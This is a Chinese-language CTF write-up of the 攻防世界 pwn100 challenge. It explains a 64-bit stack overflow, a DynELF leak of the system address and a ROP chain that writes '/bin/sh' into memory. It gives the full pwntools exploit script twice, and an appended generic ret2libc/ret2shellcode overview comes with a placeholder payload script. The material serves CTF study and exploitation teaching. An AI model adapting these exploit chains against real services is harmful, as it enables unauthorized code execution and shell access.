攻防世界pwn100 详细的WP

本文详细解析了一个64位系统上的pwn题目,通过检查程序安全配置,利用栈溢出漏洞,借助DynELF泄露system地址,再利用ROP技术修改寄存器值,最终实现对内存区域的任意写入,注入'/bin/sh'并获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

pwn萌新做pwn题了
首先checksec

shellcode肯定是行不通了
IDA打开看看

发现有个函数,读取200字节,但a1数组却只有40字节,出现了栈溢出漏洞,那么EIP就是在48字节之后的八个字节
查看程序导入,发现没有system,查看string,发现没有’/bin/sh’
所以要先想办法泄露system的地址,用Dynelf即可,那么如何写泄露函数呢?
由于是64位系统,所以得想办法修改rdi寄存器的值,找到相应的代码段(gadget,例如pop rdi,ret),然后利用ROP执行过去修改rdi,最后还要跳回到start,代码复用

p=process("./pwn100")
elf=ELF("./pwn100")
puts_addr=elf.plt["puts"]
read_addr=elf.got["read"]
start_addr=0x400550
rdi=0x400763    #pop rdi,ret
def leak(addr):
	payload='a'*0x48+p64(rdi)+p64(addr)   
	payload+=p64(puts_addr)+p64(start_addr)   #构造puts栈帧,泄露地址,然后返回到start
	payload=payload.ljust(200,'a')    #由于要读入200字节,补全即可
	p.send(payload)
	p.recvuntil("bye~\n")
	before=""
	buf=""
	count=0
	while True:    #puts函数截断,需要独特的读取技巧
		c=p.recv(numb=1,timeout=0.5)
		count+=1
		if before=='\n' and c=="":
			buf=buf[:-1]
			buf+="\x00"
			break
		else:
			buf+=c
			before=c
	buf=buf[:4]  #这就是泄露的地址
	log.info("%#x => %s" % (addr,(buf or '').encode('hex')))
	return buf
libc=DynELF(leak,elf=elf)
sys_addr=libc.lookup("system","libc")
print(hex(sys_addr))

这样就可以泄露system的地址了
但是还得有system的参数’/bin/sh’
由于导入了read,函数于是乎可以利用rop对内存区域进行任意写,随便找块可写的地址写入参数

rop1=0x40075A
rop2=0x400740
payload='a'*0x48+p64(rop1)+p64(0)+p64(1)+p64(read_addr)+p64(8)+p64(0x601000)+p64(1)
payload=payload+p64(rop2)+"\x00"*56+p64(start_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")

来解释下这个payload吧
先看看rop1和rop2

我们知道read有三个参数,所以必须要使用的三个传参寄存器rdi, rsi, rdx
在这一段代码中都有相应的代码进行修改。
所以这里看得出,rdi(edi)由r15d修改,rsi由r14修改,rdx由r13修改,而这里的r13,r14,r15由0x40075A处的代码进行修改。

所以我们需要先修改r13 r14 r15,然后再mov给rdi,rsi,rdx
于是乎可以得到payload要先执行0x40075A处,再执行0x400740.
而rop1为什么要从pop rbx开始呢,我们看看400740处的代码,发现有个call和jmp,既然我们要调用read为什么不直接用现成的代码段,而非再构建一个呢?
所以我们可以控制r12为read地址,rbx为0,这样r12+rbx*8就是read的地址,同时又可以绕过后面的jnz,岂不美哉!!!!

当然我们可以发现,执行了rop2,后面的六个pop再次执行了一遍,这是没有意义的,但是你执行完rop2在覆盖eip的时候,会进行六个pop,还有个add rsp,8.
从这里可以看出栈指针rsp下降了7*8个字节,而ret是根据栈顶来取地址放入eip的,所以在中间还要填充56个字节(这里是’\x00’)

现在已经得到了system地址和’/bin/sh’,最后在利用一次,获取shell
代码汇总一下:

from pwn import *
context.log_level='debug'
p=process("./pwn100")
elf=ELF("./pwn100")
puts_addr=elf.plt["puts"]
read_addr=elf.got["read"]
start_addr=0x400550
rdi=0x400763
rop1=0x40075A
rop2=0x400740
def leak(addr):
	payload='a'*0x48+p64(rdi)+p64(addr)
	payload+=p64(puts_addr)+p64(start_addr)
	payload=payload.ljust(200,'a')
	p.send(payload)
	p.recvuntil("bye~\n")
	before=""
	buf=""
	count=0
	while True:
		c=p.recv(numb=1,timeout=0.5)
		count+=1
		if before=='\n' and c=="":
			buf=buf[:-1]
			buf+="\x00"
			break
		else:
			buf+=c
			before=c
	buf=buf[:4]
	log.info("%#x => %s" % (addr,(buf or '').encode('hex')))
	return buf
libc=DynELF(leak,elf=elf)
sys_addr=libc.lookup("system","libc")
print(hex(sys_addr))
payload='a'*0x48+p64(rop1)+p64(0)+p64(1)+p64(read_addr)+p64(8)+p64(0x601000)+p64(1)
payload=payload+p64(rop2)+"\x00"*56+p64(start_addr)
payload=payload.ljust(200,'a')
p.send(payload)
p.recvuntil("bye~\n")
p.send("/bin/sh\x00")
payload="a"*0x48+p64(rdi)+p64(0x601000)+p64(sys_addr)
payload=payload.ljust(200,"a")
p.send(payload)
p.interactive()

还有一件事,这个0x601000是可以写的地址,用于写入/bin/sh。。

最后附上另外一个ROP原理解惑文章23333
ROP

### 关于攻防世界PWN-100目的解答 #### 解决方案概述 对于攻防世界PWN-100目,通常涉及的是基础的缓冲区溢出攻击。这类目旨在测试参赛者对Linux防护机制的理解程度以及绕过这些保护措施的能力。常见的技术包括但不限于返回导向编程(Return-Oriented Programming, ROP)、重定向到已知位置的shellcode执行(ret2shellcode)或是利用动态链接库中的函数实现系统命令调用(ret2libc)[^1]。 #### 技术细节 当面对没有启用地址空间布局随机化(ASLR)且未开启不可执行堆栈(NX bit off)的情况时,可以直接采用`ret2shellcode`的方式解决问。此方法要求选手能够找到足够的空间放置自定义的shellcode,并通过控制EIP指向这段代码来完成最终的目标——通常是打开一个远程shell连接给攻击者[^3]。 如果遇到开启了NX位但是禁用了位置独立可执行文件(PIE),那么可以考虑使用`ret2libc`策略。这种方法依赖于将返回地址设置为标准C库(glibc)内的某个有用功能的位置,比如system()函数,从而间接地触发所需的恶意操作而无需注入新的机器码片段。 针对具体环境下的不同情况,还需要掌握诸如IDA Pro这样的反汇编工具来进行二进制分析工作;同时熟悉GDB调试技巧以便更好地理解程序内部逻辑并定位潜在的安全漏洞所在之处。 ```python from pwn import * # 连接到远程服务 conn = remote('challenge.ctf.games', PORT) # 发送payload前先接收初始消息 print(conn.recvline()) # 构造payload offset = 64 # 假设偏移量为64字节 junk = b'A' * offset return_address = pack('<I', 0xdeadbeef) # 替换为目标地址 exploit_payload = junk + return_address # 发送payload conn.send(exploit_payload) # 接收响应数据 result = conn.recvall() print(result.decode()) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值